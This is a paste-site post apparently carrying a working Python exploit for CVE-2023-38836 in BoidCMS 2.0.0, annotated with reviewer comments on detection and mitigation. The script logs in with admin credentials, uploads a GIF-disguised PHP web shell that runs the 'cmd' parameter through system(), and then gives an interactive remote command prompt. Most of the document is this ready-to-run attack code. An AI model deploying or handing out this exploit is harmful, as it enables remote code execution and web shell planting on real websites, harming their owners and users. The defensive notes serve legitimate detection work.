FlyFar

BoidCMS v2.0.0 - Authenticated File Upload Vulnerability - CVE-2023-38836

Jan 17th, 2024
#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836
#
# Reviewer notes (defensive context):
# - Flow exercised: log in to /admin with supplied admin credentials, upload a
#   file named shell.php through /admin?page=media, then request it under
#   /media/ with a `cmd` query parameter.
# - Precondition: valid admin credentials. The issue is post-authentication,
#   so admin account hygiene (unique strong password, restricted network
#   access to /admin) directly limits exposure.
# - The uploaded content begins with a GIF signature ("GIF89a") followed by
#   PHP. Presumably the server-side upload check inspects file content rather
#   than the extension -- confirm against the advisory for CVE-2023-38836.
# - Detection: in web access logs, look for a POST to /admin?page=media
#   followed by GET requests to a .php file under /media/, especially with a
#   `cmd` query string; on disk, look for .php files in the media directory
#   and for files whose first bytes are "GIF89a" but which contain "<?php".
# - Mitigation: update to a release newer than the affected range listed
#   above; configure the web server so nothing under the media directory is
#   passed to the PHP interpreter; allow-list upload extensions server-side.

import requests
import re
import argparse

# Command-line interface: target base URL plus the admin credentials.
parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url=args.url
user=args.user
passwd=args.passwd

def showhelp():
    """Print the argparse usage text and terminate the script."""
    print(parser.print_help())
    exit()
# All three arguments are mandatory; a missing one shows usage and exits.
if base_url == None: showhelp()
elif user == None: showhelp()
elif passwd == None: showhelp()

# One Session is used throughout so the login cookie carries over to the
# later media-page requests.
with requests.Session() as s:
    # Fetch the login page and pull every 64-character [a-z0-9] run out of it;
    # presumably this is the form's anti-CSRF token -- confirm against the CMS.
    req=s.get(f'{base_url}/admin')
    token=re.findall('[a-z0-9]{64}',req.text)
    form_login_data={
        "username":user,
        "password":passwd,
        "login":"Login",
    }
    form_login_data['token']=token
    # Authenticate; the response is not inspected, so a failed login is not
    # reported at this point.
    s.post(f'{base_url}/admin',data=form_login_data)
    #=========== File upload to RCE
    # The media page is fetched to obtain a fresh token for the upload form.
    req=s.get(f'{base_url}/admin?page=media')
    token=re.findall('[a-z0-9]{64}',req.text)
    form_upld_data={
        "token":token,
        "upload":"Upload"
    }
    #==== php shell
    # Payload: a GIF signature line followed by PHP that runs the `cmd`
    # request parameter. It is written to shell.php in the current working
    # directory of the machine running the script (a local artifact).
    php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
    with open('shell.php','w') as f:
        f.writelines(php_code)
    #====
    # Multipart upload through the media form. Server side, this POST is the
    # request to alert on when the uploaded filename ends in .php.
    file = {'file' : open('shell.php','rb')}
    s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
    # The file is then requested from the web-accessible /media/ path.
    req=s.get(f'{base_url}/media/shell.php')
    # Intended as an upload-failure check on that request.
    if req.status_code == '404':
        print("Upload failed")
        exit()
    print(f'Shell uploaded to "{base_url}/media/shell.php"')
    # Interactive loop: each line typed is sent as the `cmd` query parameter
    # and the response body is printed. Every iteration produces one GET to
    # /media/shell.php?cmd=... in the target's access log.
    while 1:
        cmd=input("cmd >> ")
        if cmd=='exit': exit()
        req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
        print(req.text)
Tags: Exploit